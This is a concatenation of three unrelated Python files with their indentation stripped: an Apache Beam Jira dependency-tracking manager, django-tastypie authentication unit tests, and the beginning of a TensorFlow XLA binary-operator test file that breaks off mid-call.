_ISSUE_REOPEN_DAYS = 180
class JiraManager:
def __init__(self, jira_url, jira_username, jira_password, owners_file):
options = {
'server': jira_url
}
basic_auth = (jira_username, jira_password)
self.jira = JiraClient(options, basic_auth, _JIRA_PROJECT_NAME)
with open(owners_file) as f:
owners = yaml.load(f)
self.owners_map = owners['deps']
logging.getLogger().setLevel(logging.INFO)
def run(self, dep_name,
dep_current_version,
dep_latest_version,
sdk_type,
group_id=None):
"""
Manage the jira issue for a dependency
Args:
dep_name,
dep_current_version,
dep_latest_version,
sdk_type: Java, Python
group_id (optional): only required for Java dependencies
Return: Jira Issue
"""
logging.info("Start handling the JIRA issues for {0} dependency: {1} {2}".format(
sdk_type, dep_name, dep_latest_version))
try:
# find the parent issue for Java deps base on the groupID
parent_issue = None
if sdk_type == 'Java':
summary = _ISSUE_SUMMARY_PREFIX + group_id
parent_issues = self._search_issues(summary)
for i in parent_issues:
if i.fields.summary == summary:
parent_issue = i
break
# Create a new parent issue if no existing found
if not parent_issue:
logging.info("""Did not find existing issue with name {0}. \n
Created a parent issue for {1}""".format(summary, group_id))
try:
parent_issue = self._create_issue(group_id, None, None)
except:
logging.error("""Failed creating a parent issue for {0}.
Stop handling the JIRA issue for {1}, {2}""".format(group_id, dep_name, dep_latest_version))
return
# Reopen the existing parent issue if it was closed
elif (parent_issue.fields.status.name != 'Open' and
parent_issue.fields.status.name != 'Reopened'):
logging.info("""The parent issue {0} is not opening. Attempt reopening the issue""".format(parent_issue.key))
try:
self.jira.reopen_issue(parent_issue)
except:
traceback.print_exc()
logging.error("""Failed reopening the parent issue {0}.
Stop handling the JIRA issue for {1}, {2}""".format(parent_issue.key, dep_name, dep_latest_version))
return
logging.info("Found the parent issue {0}. Continuous to create or update the sub-task for {1}".format(parent_issue.key, dep_name))
# creating a new issue/sub-task or updating on the existing issue of the dep
summary = _ISSUE_SUMMARY_PREFIX + dep_name
issues = self._search_issues(summary)
issue = None
for i in issues:
if i.fields.summary == summary:
issue = i
break
# Create a new JIRA if no existing one.
if not issue:
if sdk_type == 'Java':
issue = self._create_issue(dep_name, dep_current_version, dep_latest_version, is_subtask=True, parent_key=parent_issue.key)
else:
issue = self._create_issue(dep_name, dep_current_version, dep_latest_version)
logging.info('Created a new issue {0} of {1} {2}'.format(issue.key, dep_name, dep_latest_version))
# Add descriptions in to the opening issue.
elif issue.fields.status.name == 'Open' or issue.fields.status.name == 'Reopened':
self._append_descriptions(issue, dep_name, dep_current_version, dep_latest_version)
logging.info('Updated the existing issue {0} of {1} {2}'.format(issue.key, dep_name, dep_latest_version))
# Check if we need reopen the issue if it was closed. If so, reopen it then add descriptions.
elif self._need_reopen(issue, dep_latest_version):
self.jira.reopen_issue(issue)
self._append_descriptions(issue, dep_name, dep_current_version, dep_latest_version)
logging.info("Reopened the issue {0} for {1} {2}".format(issue.key, dep_name, dep_latest_version))
return issue
except:
raise
def _create_issue(self, dep_name, dep_current_version, dep_latest_version, is_subtask=False, parent_key=None):
"""
Create a new issue or subtask
Args:
dep_name,
dep_latest_version,
is_subtask,
parent_key: only required if the 'is_subtask'is true.
"""
logging.info("Creating a new JIRA issue to track {0} upgrade process".format(dep_name))
summary = _ISSUE_SUMMARY_PREFIX + dep_name
description = self._create_descriptions(dep_name, dep_current_version, dep_latest_version)
try:
if not is_subtask:
issue = self.jira.create_issue(summary, [_JIRA_COMPONENT], description)
else:
issue = self.jira.create_issue(summary, [_JIRA_COMPONENT], description, parent_key=parent_key)
except Exception as e:
logging.error("Failed creating issue: "+ str(e))
raise e
return issue
def _search_issues(self, summary):
"""
Search issues by using issues' summary.
Args:
summary: a string
Return:
A list of issues
"""
try:
issues = self.jira.get_issues_by_summary(summary)
except Exception as e:
logging.error("Failed searching issues: "+ str(e))
return []
return issues
def _append_descriptions(self, issue, dep_name, dep_current_version, dep_latest_version):
"""
Add descriptions on an existing issue.
Args:
issue: Jira issue
dep_name
dep_latest_version
"""
logging.info("Updating JIRA issue {0} to track {1} upgrade process".format(
issue.key,
dep_name))
description = self._create_descriptions(dep_name, dep_current_version, dep_latest_version, issue=issue)
try:
self.jira.update_issue(issue, description=description)
except Exception as e:
traceback.print_exc()
logging.error("Failed updating issue: "+ str(e))
def _create_descriptions(self, dep_name, dep_current_version, dep_latest_version, issue = None):
"""
Create descriptions for JIRA issues.
Args:
dep_name
dep_latest_version
issue
"""
description = ""
if issue:
description = issue.fields.description
description += """\n\n ------------------------- {0} -------------------------\n
Please consider upgrading the dependency {1}. \n
The current version is {2}. The latest version is {3} \n
cc: """.format(
datetime.today(),
dep_name,
dep_current_version,
dep_latest_version
)
owners = self._find_owners(dep_name)
for owner in owners:
description += "[~{0}], ".format(owner)
description += ("\n Please refer to "
"[Beam Dependency Guide |https://beam.apache.org/contribute/dependencies/]"
"for more information. \n"
"Do Not Modify The Description Above. \n")
return description
def _find_owners(self, dep_name):
"""
Find owners for a dependency/
Args:
dep_name
Return:
primary: The primary owner of the dep. The Jira issue will be assigned to the primary owner.
others: A list of other owners of the dep. Owners will be cc'ed in the description.
"""
try:
dep_info = self.owners_map[dep_name]
owners = dep_info['owners']
if not owners:
logging.warning("Could not find owners for " + dep_name)
return []
except KeyError:
traceback.print_exc()
logging.warning("Could not find the dependency info of {0} in the OWNERS configurations.".format(dep_name))
return []
except Exception as e:
traceback.print_exc()
logging.error("Failed finding dependency owners: "+ str(e))
return None
logging.info("Found owners of {0}: {1}".format(dep_name, owners))
owners = owners.split(',')
owners = map(str.strip, owners)
owners = list(filter(None, owners))
return owners
def _need_reopen(self, issue, dep_latest_version):
"""
Return a boolean that indicates whether reopen the closed issue.
"""
# Check if the issue was closed with a "fix version/s"
# Reopen the issue if it hits the next release version.
next_release_version = self._get_next_release_version()
for fix_version in issue.fields.fixVersions:
if fix_version.name in next_release_version:
return True
# Check if there is other new versions released.
# Reopen the issue if 3 new versions have been released in 6 month since closure.
try:
if issue.fields.resolutiondate:
closing_date = datetime.strptime(issue.fields.resolutiondate[:19], "%Y-%m-%dT%H:%M:%S")
if (datetime.today() - closing_date).days >= _ISSUE_REOPEN_DAYS:
# Extract the previous version when JIRA closed.
descriptions = issue.fields.description.splitlines()
descriptions = descriptions[len(descriptions)-5]
# The version info has been stored in the JIRA description in a specific format.
# Such as "Please review and upgrade the <dep name> to the latest version <version>"
previous_version = descriptions.split("The latest version is", 1)[1].strip()
if version_comparer.compare_dependency_versions(previous_version, dep_latest_version):
return True
except Exception as e:
traceback.print_exc()
logging.error("Failed deciding to reopen the issue." + str(e))
return False
return False
def _get_next_release_version(self):
"""
Return the incoming release version from sdks/python/apache_beam/version.py
"""
global_names = {}
exec(
open(os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'../../../sdks/python/',
'apache_beam/version.py')
).read(),
global_names
)
return global_names['__version__']
| |
import base64
import os
import time
import warnings
from django.conf import settings
from django.contrib.auth.models import AnonymousUser, User
from django.http import HttpRequest
from django.test import TestCase
from django.test.testcases import skipIf
from tastypie.authentication import Authentication, BasicAuthentication,\
ApiKeyAuthentication, SessionAuthentication, DigestAuthentication,\
OAuthAuthentication, MultiAuthentication
from tastypie.http import HttpUnauthorized
from tastypie.models import ApiKey, create_api_key
# Be tricky.
from tastypie.authentication import python_digest, oauth2, oauth_provider
if python_digest is None:
warnings.warn("Running tests without python_digest! Bad news!")
if oauth2 is None:
warnings.warn("Running tests without oauth2! Bad news!")
if oauth_provider is None:
warnings.warn("Running tests without oauth_provider! Bad news!")
class AuthenticationTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_is_authenticated(self):
auth = Authentication()
request = HttpRequest()
# Doesn't matter. Always true.
self.assertTrue(auth.is_authenticated(None))
self.assertTrue(auth.is_authenticated(request))
def test_get_identifier(self):
auth = Authentication()
request = HttpRequest()
self.assertEqual(auth.get_identifier(request), 'noaddr_nohost')
request = HttpRequest()
request.META['REMOTE_ADDR'] = '127.0.0.1'
request.META['REMOTE_HOST'] = 'nebula.local'
self.assertEqual(auth.get_identifier(request), '127.0.0.1_nebula.local')
def test_check_active_false(self):
auth = Authentication(require_active=False)
user = User.objects.get(username='johndoe')
self.assertTrue(auth.check_active(user))
auth = Authentication(require_active=False)
user = User.objects.get(username='bobdoe')
self.assertTrue(auth.check_active(user))
def test_check_active_true(self):
auth = Authentication(require_active=True)
user = User.objects.get(username='johndoe')
self.assertTrue(auth.check_active(user))
auth = Authentication(require_active=True)
user = User.objects.get(username='bobdoe')
self.assertFalse(auth.check_active(user))
# Check the default.
auth = Authentication()
user = User.objects.get(username='bobdoe')
self.assertFalse(auth.check_active(user))
class BasicAuthenticationTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_is_authenticated(self):
auth = BasicAuthentication()
request = HttpRequest()
# No HTTP Basic auth details should fail.
self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
# HttpUnauthorized with auth type and realm
self.assertEqual(auth.is_authenticated(request)['WWW-Authenticate'], 'Basic Realm="django-tastypie"')
# Wrong basic auth details.
request.META['HTTP_AUTHORIZATION'] = 'abcdefg'
self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
# No password.
request.META['HTTP_AUTHORIZATION'] = base64.b64encode('daniel'.encode('utf-8')).decode('utf-8')
self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
# Wrong user/password.
request.META['HTTP_AUTHORIZATION'] = base64.b64encode('daniel:pass'.encode('utf-8')).decode('utf-8')
self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
# Correct user/password.
john_doe = User.objects.get(username='johndoe')
john_doe.set_password('pass')
john_doe.save()
request.META['HTTP_AUTHORIZATION'] = 'Basic %s' % base64.b64encode('johndoe:pass'.encode('utf-8')).decode('utf-8')
self.assertEqual(auth.is_authenticated(request), True)
# Regression: Password with colon.
john_doe = User.objects.get(username='johndoe')
john_doe.set_password('pass:word')
john_doe.save()
request.META['HTTP_AUTHORIZATION'] = 'Basic %s' % base64.b64encode('johndoe:pass:word'.encode('utf-8')).decode('utf-8')
self.assertEqual(auth.is_authenticated(request), True)
# Capitalization shouldn't matter.
john_doe = User.objects.get(username='johndoe')
john_doe.set_password('pass:word')
john_doe.save()
request.META['HTTP_AUTHORIZATION'] = 'bAsIc %s' % base64.b64encode('johndoe:pass:word'.encode('utf-8')).decode('utf-8')
self.assertEqual(auth.is_authenticated(request), True)
def test_check_active_true(self):
auth = BasicAuthentication()
request = HttpRequest()
bob_doe = User.objects.get(username='bobdoe')
bob_doe.set_password('pass')
bob_doe.save()
request.META['HTTP_AUTHORIZATION'] = 'Basic %s' % base64.b64encode('bobdoe:pass'.encode('utf-8')).decode('utf-8')
self.assertFalse(auth.is_authenticated(request))
def test_check_active_false(self):
auth = BasicAuthentication(require_active=False)
request = HttpRequest()
bob_doe = User.objects.get(username='bobdoe')
bob_doe.set_password('pass')
bob_doe.save()
request.META['HTTP_AUTHORIZATION'] = 'Basic %s' % base64.b64encode('bobdoe:pass'.encode('utf-8')).decode('utf-8')
self.assertTrue(auth.is_authenticated(request))
class ApiKeyAuthenticationTestCase(TestCase):
fixtures = ['note_testdata.json']
def setUp(self):
super(ApiKeyAuthenticationTestCase, self).setUp()
ApiKey.objects.all().delete()
def test_is_authenticated_get_params(self):
auth = ApiKeyAuthentication()
request = HttpRequest()
# Simulate sending the signal.
john_doe = User.objects.get(username='johndoe')
create_api_key(User, instance=john_doe, created=True)
# No username/api_key details should fail.
self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
# Wrong username details.
request.GET['username'] = 'foo'
self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
# No api_key.
request.GET['username'] = 'daniel'
self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
# Wrong user/api_key.
request.GET['username'] = 'daniel'
request.GET['api_key'] = 'foo'
self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
# Correct user/api_key.
john_doe = User.objects.get(username='johndoe')
request.GET['username'] = 'johndoe'
request.GET['api_key'] = john_doe.api_key.key
self.assertEqual(auth.is_authenticated(request), True)
self.assertEqual(auth.get_identifier(request), 'johndoe')
def test_is_authenticated_header(self):
auth = ApiKeyAuthentication()
request = HttpRequest()
# Simulate sending the signal.
john_doe = User.objects.get(username='johndoe')
create_api_key(User, instance=john_doe, created=True)
# No username/api_key details should fail.
self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
# Wrong username details.
request.META['HTTP_AUTHORIZATION'] = 'foo'
self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
# No api_key.
request.META['HTTP_AUTHORIZATION'] = 'ApiKey daniel'
self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
# Wrong user/api_key.
request.META['HTTP_AUTHORIZATION'] = 'ApiKey daniel:pass'
self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
# Correct user/api_key.
john_doe = User.objects.get(username='johndoe')
request.META['HTTP_AUTHORIZATION'] = 'ApiKey johndoe:%s' % john_doe.api_key.key
self.assertEqual(auth.is_authenticated(request), True)
# Capitalization shouldn't matter.
john_doe = User.objects.get(username='johndoe')
request.META['HTTP_AUTHORIZATION'] = 'aPiKeY johndoe:%s' % john_doe.api_key.key
self.assertEqual(auth.is_authenticated(request), True)
# No api_key.
john_doe = User.objects.get(username='johndoe')
api_key = john_doe.api_key
api_key.delete()
request.META['HTTP_AUTHORIZATION'] = 'ApiKey johndoe:%s' % api_key.key
self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
def test_check_active_true(self):
auth = ApiKeyAuthentication()
request = HttpRequest()
bob_doe = User.objects.get(username='bobdoe')
create_api_key(User, instance=bob_doe, created=True)
request.META['HTTP_AUTHORIZATION'] = 'ApiKey bobdoe:%s' % bob_doe.api_key.key
self.assertFalse(auth.is_authenticated(request))
def test_check_active_false(self):
auth = BasicAuthentication(require_active=False)
request = HttpRequest()
bob_doe = User.objects.get(username='bobdoe')
create_api_key(User, instance=bob_doe, created=True)
request.META['HTTP_AUTHORIZATION'] = 'ApiKey bobdoe:%s' % bob_doe.api_key.key
self.assertTrue(auth.is_authenticated(request))
class SessionAuthenticationTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_is_authenticated(self):
auth = SessionAuthentication()
request = HttpRequest()
request.method = 'POST'
request.COOKIES = {
settings.CSRF_COOKIE_NAME: 'abcdef1234567890abcdef1234567890'
}
# No CSRF token.
request.META = {}
self.assertFalse(auth.is_authenticated(request))
# Invalid CSRF token.
request.META = {
'HTTP_X_CSRFTOKEN': 'abc123'
}
self.assertFalse(auth.is_authenticated(request))
# Not logged in.
request.META = {
'HTTP_X_CSRFTOKEN': 'abcdef1234567890abcdef1234567890'
}
request.user = AnonymousUser()
self.assertFalse(auth.is_authenticated(request))
# Logged in.
request.user = User.objects.get(username='johndoe')
self.assertTrue(auth.is_authenticated(request))
# Logged in (with GET & no token).
request.method = 'GET'
request.META = {}
request.user = User.objects.get(username='johndoe')
self.assertTrue(auth.is_authenticated(request))
# Secure & wrong referrer.
os.environ["HTTPS"] = "on"
request.method = 'POST'
request.META = {
'HTTP_X_CSRFTOKEN': 'abcdef1234567890abcdef1234567890'
}
request.META['HTTP_HOST'] = 'example.com'
request.META['HTTP_REFERER'] = ''
self.assertFalse(auth.is_authenticated(request))
# Secure & correct referrer.
request.META['HTTP_REFERER'] = 'https://example.com/'
self.assertTrue(auth.is_authenticated(request))
os.environ["HTTPS"] = "off"
def test_get_identifier(self):
auth = SessionAuthentication()
request = HttpRequest()
# Not logged in.
request.user = AnonymousUser()
self.assertEqual(auth.get_identifier(request), '')
# Logged in.
request.user = User.objects.get(username='johndoe')
self.assertEqual(auth.get_identifier(request), 'johndoe')
@skipIf(python_digest is None, "python-digest is not installed")
class DigestAuthenticationTestCase(TestCase):
fixtures = ['note_testdata.json']
def setUp(self):
super(DigestAuthenticationTestCase, self).setUp()
ApiKey.objects.all().delete()
def test_is_authenticated(self):
auth = DigestAuthentication()
request = HttpRequest()
# Simulate sending the signal.
john_doe = User.objects.get(username='johndoe')
create_api_key(User, instance=john_doe, created=True)
# No HTTP Basic auth details should fail.
auth_request = auth.is_authenticated(request)
self.assertEqual(isinstance(auth_request, HttpUnauthorized), True)
# HttpUnauthorized with auth type and realm
self.assertEqual(auth_request['WWW-Authenticate'].find('Digest'), 0)
self.assertEqual(auth_request['WWW-Authenticate'].find(' realm="django-tastypie"') > 0, True)
self.assertEqual(auth_request['WWW-Authenticate'].find(' opaque=') > 0, True)
self.assertEqual(auth_request['WWW-Authenticate'].find('nonce=') > 0, True)
# Wrong basic auth details.
request.META['HTTP_AUTHORIZATION'] = 'abcdefg'
auth_request = auth.is_authenticated(request)
self.assertEqual(isinstance(auth_request, HttpUnauthorized), True)
# No password.
request.META['HTTP_AUTHORIZATION'] = base64.b64encode('daniel'.encode('utf-8')).decode('utf-8')
auth_request = auth.is_authenticated(request)
self.assertEqual(isinstance(auth_request, HttpUnauthorized), True)
# Wrong user/password.
request.META['HTTP_AUTHORIZATION'] = base64.b64encode('daniel:pass'.encode('utf-8')).decode('utf-8')
auth_request = auth.is_authenticated(request)
self.assertEqual(isinstance(auth_request, HttpUnauthorized), True)
# Correct user/password.
john_doe = User.objects.get(username='johndoe')
request.META['HTTP_AUTHORIZATION'] = python_digest.build_authorization_request(
username=john_doe.username,
method=request.method,
uri='/',
nonce_count=1,
digest_challenge=python_digest.parse_digest_challenge(auth_request['WWW-Authenticate']),
password=john_doe.api_key.key
)
auth_request = auth.is_authenticated(request)
self.assertEqual(auth_request, True)
def test_check_active_true(self):
auth = DigestAuthentication()
request = HttpRequest()
bob_doe = User.objects.get(username='bobdoe')
create_api_key(User, instance=bob_doe, created=True)
auth_request = auth.is_authenticated(request)
request.META['HTTP_AUTHORIZATION'] = python_digest.build_authorization_request(
username=bob_doe.username,
method=request.method,
uri='/',
nonce_count=1,
digest_challenge=python_digest.parse_digest_challenge(auth_request['WWW-Authenticate']),
password=bob_doe.api_key.key
)
auth_request = auth.is_authenticated(request)
self.assertFalse(auth_request)
def test_check_active_false(self):
auth = DigestAuthentication(require_active=False)
request = HttpRequest()
bob_doe = User.objects.get(username='bobdoe')
create_api_key(User, instance=bob_doe, created=True)
auth_request = auth.is_authenticated(request)
request.META['HTTP_AUTHORIZATION'] = python_digest.build_authorization_request(
username=bob_doe.username,
method=request.method,
uri='/',
nonce_count=1,
digest_challenge=python_digest.parse_digest_challenge(auth_request['WWW-Authenticate']),
password=bob_doe.api_key.key
)
auth_request = auth.is_authenticated(request)
self.assertTrue(auth_request, True)
@skipIf(not oauth2 or not oauth_provider, "oauth provider not installed")
class OAuthAuthenticationTestCase(TestCase):
fixtures = ['note_testdata.json']
def setUp(self):
super(OAuthAuthenticationTestCase, self).setUp()
self.request = HttpRequest()
self.request.META['SERVER_NAME'] = 'testsuite'
self.request.META['SERVER_PORT'] = '8080'
self.request.REQUEST = self.request.GET = {}
self.request.method = "GET"
from oauth_provider.models import Consumer, Token, Resource
self.user = User.objects.create_user('daniel', 'test@example.com', 'password')
self.user_inactive = User.objects.get(username='bobdoe')
self.resource, _ = Resource.objects.get_or_create(url='test', defaults={
'name': 'Test Resource'
})
self.consumer, _ = Consumer.objects.get_or_create(key='123', defaults={
'name': 'Test',
'description': 'Testing...'
})
self.token, _ = Token.objects.get_or_create(key='foo', token_type=Token.ACCESS, defaults={
'consumer': self.consumer,
'resource': self.resource,
'secret': '',
'user': self.user,
})
self.token_inactive, _ = Token.objects.get_or_create(key='bar', token_type=Token.ACCESS, defaults={
'consumer': self.consumer,
'resource': self.resource,
'secret': '',
'user': self.user_inactive,
})
def test_is_authenticated(self):
auth = OAuthAuthentication()
# Invalid request.
resp = auth.is_authenticated(self.request)
self.assertEqual(resp.status_code, 401)
# No username/api_key details should fail.
self.request.REQUEST = self.request.GET = {
'oauth_consumer_key': '123',
'oauth_nonce': 'abc',
'oauth_signature': '&',
'oauth_signature_method': 'PLAINTEXT',
'oauth_timestamp': str(int(time.time())),
'oauth_token': 'foo',
}
self.request.META['Authorization'] = 'OAuth ' + ','.join(
[key + '=' + value for key, value in self.request.REQUEST.items()])
resp = auth.is_authenticated(self.request)
self.assertEqual(resp, True)
self.assertEqual(self.request.user.pk, self.user.pk)
def test_check_active_true(self):
auth = OAuthAuthentication()
# No username/api_key details should fail.
self.request.REQUEST = self.request.GET = {
'oauth_consumer_key': '123',
'oauth_nonce': 'abc',
'oauth_signature': '&',
'oauth_signature_method': 'PLAINTEXT',
'oauth_timestamp': str(int(time.time())),
'oauth_token': 'bar',
}
self.request.META['Authorization'] = 'OAuth ' + ','.join(
[key + '=' + value for key, value in self.request.REQUEST.items()])
resp = auth.is_authenticated(self.request)
self.assertFalse(resp)
def test_check_active_false(self):
auth = OAuthAuthentication(require_active=False)
# No username/api_key details should fail.
self.request.REQUEST = self.request.GET = {
'oauth_consumer_key': '123',
'oauth_nonce': 'abc',
'oauth_signature': '&',
'oauth_signature_method': 'PLAINTEXT',
'oauth_timestamp': str(int(time.time())),
'oauth_token': 'bar',
}
self.request.META['Authorization'] = 'OAuth ' + ','.join(
[key + '=' + value for key, value in self.request.REQUEST.items()])
resp = auth.is_authenticated(self.request)
self.assertTrue(resp)
self.assertEqual(self.request.user.pk, self.user_inactive.pk)
class MultiAuthenticationTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_apikey_and_authentication_enforce_user(self):
session_auth = SessionAuthentication()
api_key_auth = ApiKeyAuthentication()
auth = MultiAuthentication(api_key_auth, session_auth)
john_doe = User.objects.get(username='johndoe')
request1 = HttpRequest()
request2 = HttpRequest()
request3 = HttpRequest()
request1.method = 'POST'
request1.META = {
'HTTP_X_CSRFTOKEN': 'abcdef1234567890abcdef1234567890'
}
request1.COOKIES = {
settings.CSRF_COOKIE_NAME: 'abcdef1234567890abcdef1234567890'
}
request1.user = john_doe
request2.POST['username'] = 'janedoe'
request2.POST['api_key'] = 'invalid key'
request3.method = 'POST'
request3.META = {
'HTTP_X_CSRFTOKEN': 'abcdef1234567890abcdef1234567890'
}
request3.COOKIES = {
settings.CSRF_COOKIE_NAME: 'abcdef1234567890abcdef1234567890'
}
request3.user = john_doe
request3.POST['username'] = 'janedoe'
request3.POST['api_key'] = 'invalid key'
# session auth should pass if since john_doe is logged in
self.assertTrue(session_auth.is_authenticated(request1))
# api key auth should fail because of invalid api key
self.assertEqual(isinstance(api_key_auth.is_authenticated(request2), HttpUnauthorized), True)
# multi auth shouldn't change users if api key auth fails
# multi auth passes since session auth is valid
self.assertEqual(request3.user.username, 'johndoe')
self.assertTrue(auth.is_authenticated(request3))
self.assertEqual(request3.user.username, 'johndoe')
def test_apikey_and_authentication(self):
auth = MultiAuthentication(ApiKeyAuthentication(), Authentication())
request = HttpRequest()
john_doe = User.objects.get(username='johndoe')
# No username/api_key details should pass.
self.assertEqual(auth.is_authenticated(request), True)
# The identifier should be the basic auth stock.
self.assertEqual(auth.get_identifier(request), 'noaddr_nohost')
# Wrong username details.
request = HttpRequest()
request.GET['username'] = 'foo'
self.assertEqual(auth.is_authenticated(request), True)
self.assertEqual(auth.get_identifier(request), 'noaddr_nohost')
# No api_key.
request = HttpRequest()
request.GET['username'] = 'daniel'
self.assertEqual(auth.is_authenticated(request), True)
self.assertEqual(auth.get_identifier(request), 'noaddr_nohost')
# Wrong user/api_key.
request = HttpRequest()
request.GET['username'] = 'daniel'
request.GET['api_key'] = 'foo'
self.assertEqual(auth.is_authenticated(request), True)
self.assertEqual(auth.get_identifier(request), 'noaddr_nohost')
request = HttpRequest()
request.GET['username'] = 'johndoe'
request.GET['api_key'] = john_doe.api_key.key
self.assertEqual(auth.is_authenticated(request), True)
self.assertEqual(auth.get_identifier(request), 'johndoe')
def test_apikey_and_basic_auth(self):
auth = MultiAuthentication(BasicAuthentication(), ApiKeyAuthentication())
request = HttpRequest()
john_doe = User.objects.get(username='johndoe')
# No API Key or HTTP Basic auth details should fail.
self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
# Basic Auth still returns appropriately.
self.assertEqual(auth.is_authenticated(request)['WWW-Authenticate'], 'Basic Realm="django-tastypie"')
# API Key Auth works.
request = HttpRequest()
request.GET['username'] = 'johndoe'
request.GET['api_key'] = john_doe.api_key.key
self.assertEqual(auth.is_authenticated(request), True)
self.assertEqual(auth.get_identifier(request), 'johndoe')
# Basic Auth works.
request = HttpRequest()
john_doe = User.objects.get(username='johndoe')
john_doe.set_password('pass')
john_doe.save()
request.META['HTTP_AUTHORIZATION'] = 'Basic %s' % base64.b64encode('johndoe:pass'.encode('utf-8')).decode('utf-8')
self.assertEqual(auth.is_authenticated(request), True)
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test cases for binary operators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests import xla_test
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import bitwise_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import googletest
class BinaryOpsTest(xla_test.XLATestCase):
"""Test cases for binary operators."""
def _testBinary(self, op, a, b, expected, equality_test=None):
with self.cached_session() as session:
with self.test_scope():
pa = array_ops.placeholder(dtypes.as_dtype(a.dtype), a.shape, name="a")
pb = array_ops.placeholder(dtypes.as_dtype(b.dtype), b.shape, name="b")
output = op(pa, pb)
result = session.run(output, {pa: a, pb: b})
if equality_test is None:
equality_test = self.assertAllCloseAccordingToType
equality_test(result, expected, rtol=1e-3)
def _testSymmetricBinary(self, op, a, b, expected, equality_test=None):
self._testBinary(op, a, b, expected, equality_test)
self._testBinary(op, b, a, expected, equality_test)
def ListsAreClose(self, result, expected, rtol):
"""Tests closeness of two lists of floats."""
self.assertEqual(len(result), len(expected))
for i in range(len(result)):
self.assertAllCloseAccordingToType(result[i], expected[i], rtol)
def testFloatOps(self):
for dtype in self.float_types:
if dtype == dtypes.bfloat16.as_numpy_dtype:
a = -1.01
b = 4.1
else:
a = -1.001
b = 4.01
self._testBinary(
lambda x, y: math_ops.approximate_equal(x, y, tolerance=0.0001),
np.array([[[[-1, 2.00009999], [-3, b]]]], dtype=dtype),
np.array([[[[a, 2], [-3.00009, 4]]]], dtype=dtype),
expected=np.array([[[[False, True], [True, False]]]], dtype=dtype))
self._testBinary(
gen_math_ops.real_div,
np.array([3, 3, -1.5, -8, 44], dtype=dtype),
np.array([2, -2, 7, -4, 0], dtype=dtype),
expected=np.array(
[1.5, -1.5, -0.2142857, 2, float("inf")], dtype=dtype))
self._testBinary(math_ops.pow, dtype(3), dtype(4), expected=dtype(81))
self._testBinary(
math_ops.pow,
np.array([1, 2], dtype=dtype),
np.zeros(shape=[0, 2], dtype=dtype),
expected=np.zeros(shape=[0, 2], dtype=dtype))
self._testBinary(
math_ops.pow,
np.array([10, 4], dtype=dtype),
np.array([2, 3], dtype=dtype),
expected=np.array([100, 64], dtype=dtype))
self._testBinary(
math_ops.pow,
dtype(2),
np.array([3, 4], dtype=dtype),
expected=np.array([8, 16], dtype=dtype))
self._testBinary(
math_ops.pow,
np.array([[2], [3]], dtype=dtype),
dtype(4),
expected=np.array([[16], [81]], dtype=dtype))
self._testBinary(
math_ops.atan2,
np.array([0, np.sqrt(2), 1, np.sqrt(2), 0], dtype),
np.array([1, np.sqrt(2), 0, -np.sqrt(2), -1], dtype),
expected=np.array(
[0, np.pi / 4, np.pi / 2, np.pi * 3 / 4, np.pi], dtype=dtype))
self._testBinary(
gen_math_ops.reciprocal_grad,
np.array([4, -3, -2, 1], dtype=dtype),
np.array([5, -6, 7, -8], dtype=dtype),
expected=np.array([-80, 54, -28, 8], dtype=dtype))
self._testBinary(
gen_math_ops.sigmoid_grad,
np.array([4, 3, 2, 1], dtype=dtype),
np.array([5, 6, 7, 8], dtype=dtype),
expected=np.array([-60, -36, -14, 0], dtype=dtype))
self._testBinary(
gen_math_ops.rsqrt_grad,
np.array([4, 3, 2, 1], dtype=dtype),
np.array([5, 6, 7, 8], dtype=dtype),
expected=np.array([-160, -81, -28, -4], dtype=dtype))
self._testBinary(
gen_math_ops.sqrt_grad,
np.array([4, 3, 2, 1], dtype=dtype),
np.array([5, 6, 7, 8], dtype=dtype),
expected=np.array([0.625, 1, 1.75, 4], dtype=dtype))
self._testBinary(
gen_nn_ops.softplus_grad,
np.array([4, 3, 2, 1], dtype=dtype),
np.array([5, 6, 7, 8], dtype=dtype),
expected=np.array(
[3.97322869, 2.99258232, 1.99817801, 0.99966466], dtype=dtype))
self._testBinary(
gen_nn_ops.softsign_grad,
np.array([4, 3, 2, 1], dtype=dtype),
np.array([5, 6, 7, 8], dtype=dtype),
expected=np.array(
[0.11111111, 0.06122449, 0.03125, 0.01234568], dtype=dtype))
self._testBinary(
gen_math_ops.tanh_grad,
np.array([4, 3, 2, 1], dtype=dtype),
np.array([5, 6, 7, 8], dtype=dtype),
expected=np.array([-75, -48, -21, 0], dtype=dtype))
self._testBinary(
gen_nn_ops.elu_grad,
np.array([1, 2, 3, 4, 5, 6], dtype=dtype),
